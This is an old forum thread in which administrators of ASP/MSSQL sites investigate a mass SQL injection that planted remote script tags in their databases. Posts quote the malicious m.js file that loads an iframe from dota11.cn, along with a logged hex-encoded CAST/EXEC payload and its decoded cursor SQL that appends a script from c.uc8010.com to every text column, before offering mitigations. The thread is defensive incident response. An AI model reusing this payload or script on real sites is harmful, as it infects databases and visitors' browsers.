Ad:

Windows NT / 2000 / XP Discussion Thread
Unsolved
Views: 5761

May 20th, 2008

SQL Injection

Expand Post »

We recently had a MSSQL injection on our server and don't know why it happened. We get a funny email in our ticket center that is at another data center that says we have an exploit in our code and then two hours later the server get hacked through our asp code and then we have multiple sql injection of this random string in some tables.

"<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.dot<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>"

If the code wont allow special character as a input into database writes, how can a person do a sql injection by phrasing off a compiled dll file that dosnt accept file attachments.

Similar Threads

SQL Injection Attack in Database Design
Data Safe - SQL Injection in PHP
SQL Injection Attacks in Database Design
Sql injection in MS SQL
SQl Injection through ASP and MS SQl 2000 in ASP

domeger

Reputation Points: 10

Solved Threads: 0

Newbie Poster

Offline

1 posts
since Mar 2007

Permalink

May 20th, 2008

Re: SQL Injection

I don't know about this kind of thing but if you go to
http://www.dota11.cn/m.js

this is the file that you get, maybe it shed some light on what happened.

(Toggle Plain Text)

if (navigator.systemLanguage=='zh-cn')
{
document.writeln("<script language=\"javascript\" src=\"http:\/\/count40.51yes.com\/click.aspx?id=408936399&logo=1\"><\/script>");
}
else{
document.writeln("<iframe src=http:\/\/www.dota11.cn\/dj.htm width=100 height=0><\/iframe>");
}

window.onerror=function(){return true};
document.write ('<script>var a3070tf="51la";var a3070pu="";var a3070pf="51la";var a3070su=window.location;var a3070sf=document.referrer;var a3070of="";var a3070op="";var a3070ops=1;var a3070ot=1;var a3070d=new Date();var a3070color="";if (navigator.appName=="Netscape"){a3070color=screen.pixelDepth;} else {a3070color=screen.colorDepth;}<\/script><script>a3070tf=top.document.referrer;<\/script><script>a3070pu =window.parent.location;<\/script><script>a3070pf=window.parent.document.referrer;<\/script><script>a3070ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3070ops=(a3070ops==null)?1: (parseInt(unescape((a3070ops)[2]))+1);var a3070oe =new Date();a3070oe.setTime(a3070oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3070ops+ ";path=/;expires="+a3070oe.toGMTString();a3070ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3070ot==null){a3070ot=1;}else{a3070ot=parseInt(unescape((a3070ot)[2])); a3070ot=(a3070ops==1)?(a3070ot+1):(a3070ot);}a3070oe.setTime(a3070oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3070ot+";path=/;expires="+a3070oe.toGMTString();<\/script><script>a3070of=a3070sf;if(a3070pf!=="51la"){a3070of=a3070pf;}if(a3070tf!=="51la"){a3070of=a3070tf;}a3070op=a3070pu;try{lainframe}catch(e){a3070op=a3070su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=15&id=1893070&tpages=\'+a3070ops+\'&ttimes=\'+a3070ot+\'&tzone=\'+(0-a3070d.getTimezoneOffset()/60)+\'&tcolor=\'+a3070color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3070of)+\'&vpage=\'+escape(a3070op)+\'" \/>\');<\/script>');

Last edited by compdoc; May 20th, 2008 at 11:34 am.

compdoc

Reputation Points: 14

Solved Threads: 21

Posting Whiz

Offline

325 posts
since Mar 2008

Permalink

May 22nd, 2008

Re: SQL Injection

I'd be interested if anyone has a solution to this problem as we're suffering much the same thing - our m.js files are coming from a slightly different URL, but the end result is the same.

Athersgeo

Reputation Points: 10

Solved Threads: 0

Newbie Poster

Offline

11 posts
since Aug 2005

Permalink

May 25th, 2008

Re: SQL Injection

Click to Expand / Collapse Quote originally posted by Athersgeo ...

I'd be interested if anyone has a solution to this problem as we're suffering much the same thing - our m.js files are coming from a slightly different URL, but the end result is the same.

This seems to have worked for me on a supposedly SQL Injection-proofed ASP website that was being attacked; hopefully it will work for you.

- Clean the data; restore from the last known good backup.
- Immediately set the database properties to Read-only=True (right-click the database name in SQL Server management studio, select properties, edit the Read-only property, save the settings).
- Examine the IIS logs, searching for the domain that is showing up in the malicious script statments (in my case, dota11). The lines in the IIS logs that contain the script statement should point you toward the ASP file that is vulnerable.
- Fix the ASP code. In my case, a request variable was being directly used by the code without being checked, and that is how the attack was inserting the malicious script. I added a call to InStr(UCASE(requestVariable),"SCRIPT") to filter out any values containing scripts.
- Re-enable the database to Read-only=True after being reasonably sure that the ASP code is no longer vulnerable.

circa66

Reputation Points: 10

Solved Threads: 0

Newbie Poster

Offline

2 posts
since May 2008

Permalink

May 27th, 2008

Re: SQL Injection

Thanks for the suggestions; unfortunately, at least so far, there's nothing cropping up in the IIS logs to give us a hint of which page is open - which suggests they're not using an insecure querystring to do the damage, but somehow managing to pass the data as form data.

Given all the sites that have been affected (at least so far) have no public write access to the database (only read), and the content management system uses a combination of passwords and session variables to prevent unwanted access, this is getting both more puzzling - and more worrying - by the minute.

ETA - The search has finished and it has brought to light another site that's been affected. This one does have some public write access to the database (bookings and whatnot), but that's run through a fairly strict injection trap to prevent unwanted SQL commands (as are any querystrings, come to that!), while the maintenance is hidden behind an NT logon, so in theory, this shouldn't be possible...

Last edited by Athersgeo; May 27th, 2008 at 10:50 am.

Athersgeo

Reputation Points: 10

Solved Threads: 0

Newbie Poster

Offline

11 posts
since Aug 2005

Permalink

May 28th, 2008

Re: SQL Injection

I'm getting the exact same type of injection.
Right now I'm running a search and replace on the entire DB to see how many tables/columns this has changed.

Please do share if you have any update to this.

Thanks.

ticker

Reputation Points: 10

Solved Threads: 0

Newbie Poster

Offline

1 posts
since May 2008

Permalink

May 30th, 2008

Re: SQL Injection

Update: found this in the IIS logs:

2008-05-23 00:15:23 W3SVC655445 190.000.0.0 POST /display.asp EntryId=8;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0064006F0074006100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--|324|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Incorrect_syntax_near_';'. 80 - 58.215.65.96 Mozilla/3.0+(compatible;+Indy+Library) - - 500 0 0

They're targeting a SELECT statement in the ASP file, not an UPDATE or SELECT, and the file does not contain a form.

If you decode the CAST values, here is the actual SQL that is being injected:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T
varchar(255),@C

I've changed the ASP code to check the command line parameter value to make sure that it is numeric before passing it to a SELECT statement in the code.

EntryId = request("EntryId");
If !isNumeric(EntryId)
'bail and deploy SQL injection countermeasures
End If

So, maybe try searching your IIS logs for DECLARE or NVARCHAR or CAST and see what you come with - ?

circa66

Reputation Points: 10

Solved Threads: 0

Newbie Poster

Offline

2 posts
since May 2008

Permalink

May 31st, 2008

Re: SQL Injection

We have found that in several logs besides the affected sites, BUT, not found it in the logs for all the affected sites - which had made us a little iffy on whether the two things were connected, or whether it was two sets of people attempting to do unpleasant things to our server. We've already taken some steps to block that SQL anyway, but with that decode, that makes things a lot clearer.

Thank you very, very much!

Athersgeo

Reputation Points: 10

Solved Threads: 0

Newbie Poster

Offline

11 posts
since Aug 2005

This thread is more than three months old

No one has posted to this discussion for at least three months. Please let old threads die and do not reply to them unless you feel you have something new and valuable to contribute that absolutely must be added to make the discussion complete. Otherwise, please start a new thread in this forum instead.

Previous Thread in Windows NT / 2000 / XP Forum Timeline: Slow, slow, slowwwwwwww

Next Thread in Windows NT / 2000 / XP Forum Timeline: My Computer Icon limited

DaniWeb Message

Cancel Changes

User Name
Password